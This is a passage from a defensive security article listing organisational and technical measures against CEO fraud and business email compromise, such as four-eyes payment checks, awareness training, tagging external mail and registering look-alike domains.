    3. If a transaction does not fit the defined process it should be necessary that the employee asks feedback questions which verify that it is a authorized request.
    4. Employees should participate a special social engineering training to learn how to avoid getting manipulated by an attacker. The goal of the course should be to convey how an attacker thinks, arise a general awareness for social engineering attacks and explain that such attacks are not limited to one communication channel (e.g. email, SMS, WhatsApp, personal).
    5. Only publish as little financial and personal information in social media and company websites as necessairy. This makes it harder for an adversary to prepare his attack.
    6. A two-step (4-eyes) verification process when sending out large amounts of money to foreign bank accounts helps mitigating the damage an attack. It is important that the companies culture is good enough that the second person actually really reviews the payment and can challenge the first person without fears for both of them of being in a “Big Brother” system.
    7. Do not allow employees to use their personal email address for business purpose. This avoids that a compromised private email account allows someone to gain business data access.
  2. Technical:
    1. Do not allow that an email from an external mail server is accepted by your mail server when the email address contains your domain name.
    2. Always use email signatures/encryption at least when sending mails with confidential and/or sensitive content (e.g. S/MIME, PGP).
    3. Mark emails from external mail-servers with a tag inside the subject (e.g. [EXTERNAL]). This should be done when the emails enter the company’s mail server. With conditional formatting mails can be marked in red if the mail originates outside the company.
    4. To avoid an Outlook WebAccess from being hacked and used to perform a CEO Fraud, a strong authentication method should be used in addition of a strong password policy (e.g. client certificates, two factor authentication or access restriction to VPN traffic only).
    5. Attackers may register and use similar looking domains for a CEO fraud attack. To be aware of this, the company should check if there are any similar existing domains (e.g. .co instead of .com top-level domain) and blacklist them on their mail server.
    6. Additionally the company should try to register all similar looking domains to make it harder for an attacker to register a domain for his attack which looks slightly different then the domain of the company.

Even if the described attack is a real threat, exploited by attackers around the world every day, there are some effective steps to mitigate the risk of an incident as shown above. Especially an awareness training where the employee is taught when to be suspiciously and how attackers try to manipulate people is recommended, as this is the best protection against different types of social engineering attacks.